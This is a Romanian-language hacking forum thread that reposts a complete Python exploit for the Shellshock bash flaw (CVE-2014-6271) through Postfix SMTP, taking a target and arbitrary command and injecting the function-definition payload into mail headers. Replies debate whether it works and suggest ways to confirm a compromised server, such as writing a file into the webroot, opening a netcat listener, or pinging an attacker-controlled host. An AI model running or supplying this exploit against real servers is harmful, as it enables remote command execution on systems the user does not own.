Nytro Posted October 6, 2014 Report Share Posted October 6, 2014 [h=1]Postfix SMTP - Shellshock Exploit[/h]#!/bin/python# Exploit Title: Shellshock SMTP Exploit# Date: 10/3/2014# Exploit Author: fattymcwopr# Vendor Homepage: gnu.org# Software Link: http://ftp.gnu.org/gnu/bash/# Version: 4.2.x < 4.2.48# Tested on: Debian 7 (postfix smtp server w/procmail)# CVE : 2014-6271from socket import *import sysdef usage(): print "shellshock_smtp.py <target> <command>"argc = len(sys.argv)if(argc < 3 or argc > 3): usage() sys.exit(0)rport = 25rhost = sys.argv[1]cmd = sys.argv[2]headers = ([ "To", "References", "Cc", "Bcc", "From", "Subject", "Date", "Message-ID", "Comments", "Keywords", "Resent-Date", "Resent-From", "Resent-Sender" ])s = socket(AF_INET, SOCK_STREAM)s.connect((rhost, rport))# banner grabs.recv(2048*4)def netFormat(d): d += "\n" return d.encode('hex').decode('hex')data = netFormat("mail from:<>")s.send(data)s.recv(2048*4)data = netFormat("rcpt to:<nobody>")s.send(data)s.recv(2048*4)data = netFormat("data")s.send(data)s.recv(2048*4)data = ''for h in headers: data += netFormat(h + ":() { :; };" + cmd)data += netFormat(cmd)# <CR><LF>.<CR><LF>data += "0d0a2e0d0a".decode('hex')s.send(data)s.recv(2048*4)data = netFormat("quit")s.send(data)s.recv(2048*4)Sursa: http://www.exploit-db.com/exploits/34896/ Quote Link to comment Share on other sites More sharing options...
florinul Posted October 6, 2014 Report Share Posted October 6, 2014 l-a incercat cineva? Quote Link to comment Share on other sites More sharing options...
Aerosol Posted October 6, 2014 Report Share Posted October 6, 2014 (edited) l-a incercat cineva?Ba da tu postezi doar pentru +1 Pentru cei ca tine: punctul 1. Edited October 6, 2014 by Aerosol Quote Link to comment Share on other sites More sharing options...
EcKaRz Posted October 6, 2014 Report Share Posted October 6, 2014 l-a incercat cineva?da, e fake! )))da cat e frate sa-l citesti sa il intelegi?e un script de 50 de randuri .... Quote Link to comment Share on other sites More sharing options...
Elohim Posted October 6, 2014 Report Share Posted October 6, 2014 Aparent au "uitat" de EHLO/HELO intentionat, ca o precautie pt cine nu stie ce face, sau gresesc cu ceva? Quote Link to comment Share on other sites More sharing options...
Nytro Posted October 6, 2014 Author Report Share Posted October 6, 2014 (edited) Ar trebui sa mearga si fara, pe SMTP, fara ESMTP (Extended SMTP).Nu am citit RFC-ul, dar serverele "compatibile" ar trebui sa accepte si lipsa unui HELO (din SMTP) deoarece nu pare sa fie obligatoriu.Edit: Pare obligatoriu:"In any event, a client MUST issue HELO or EHLO before starting a mail transaction."Sursa: RFC SMTP Edited October 6, 2014 by Nytro Quote Link to comment Share on other sites More sharing options...
aelius Posted October 6, 2014 Report Share Posted October 6, 2014 E obligatoriu doar la TLS Quote Link to comment Share on other sites More sharing options...
Ganav Posted October 6, 2014 Report Share Posted October 6, 2014 Ma intreb oare care ar fi cea mai putin solicitanta comanda. In POC-urile de pana acum am vazut ca lumea ping-uie un host extern pe care il detin(probabil cu tcpdump activ). Ulterior verifica pachetele in functie de IP(atacul s-a executat cu succes daca s-a receptionat vreun pachet). cmd ar putea fi si o comanda care sa nu depinda de un host extern; in cazul unui server web(cu apache instalat) am putea rula:echo testtesttest > /var/www/nume_host/.testdupa care verificam daca fisierul .test din webroot a fost creat. Am putea, de asemenea, sa punem netcat in ascultare pe un port TCP arbitrar:nc -l 12131 -vDaca ne putem conecta pe acel port atunci server-ul este vulnerabil. Quote Link to comment Share on other sites More sharing options...
MadAgent Posted October 7, 2014 Report Share Posted October 7, 2014 Ma intreb oare care ar fi cea mai putin solicitanta comanda. In POC-urile de pana acum am vazut ca lumea ping-uie un host extern pe care il detin(probabil cu tcpdump activ). Ulterior verifica pachetele in functie de IP(atacul s-a executat cu succes daca s-a receptionat vreun pachet). cmd ar putea fi si o comanda care sa nu depinda de un host extern; in cazul unui server web(cu apache instalat) am putea rula:echo testtesttest > /var/www/nume_host/.testdupa care verificam daca fisierul .test din webroot a fost creat. Am putea, de asemenea, sa punem netcat in ascultare pe un port TCP arbitrar:nc -l 12131 -vDaca ne putem conecta pe acel port atunci server-ul este vulnerabil.Daca are webpage-ul in alt dir sau daca are altcineva drepturi pe directory, nu se poate scrie in fisier. Daca are iptables in picioare, nu se deschide port.Rar se blocheaza ping din iptables, si de obicei se blocheaza incoming, nu outgoing, deci e cel mai sigur asa Quote Link to comment Share on other sites More sharing options...
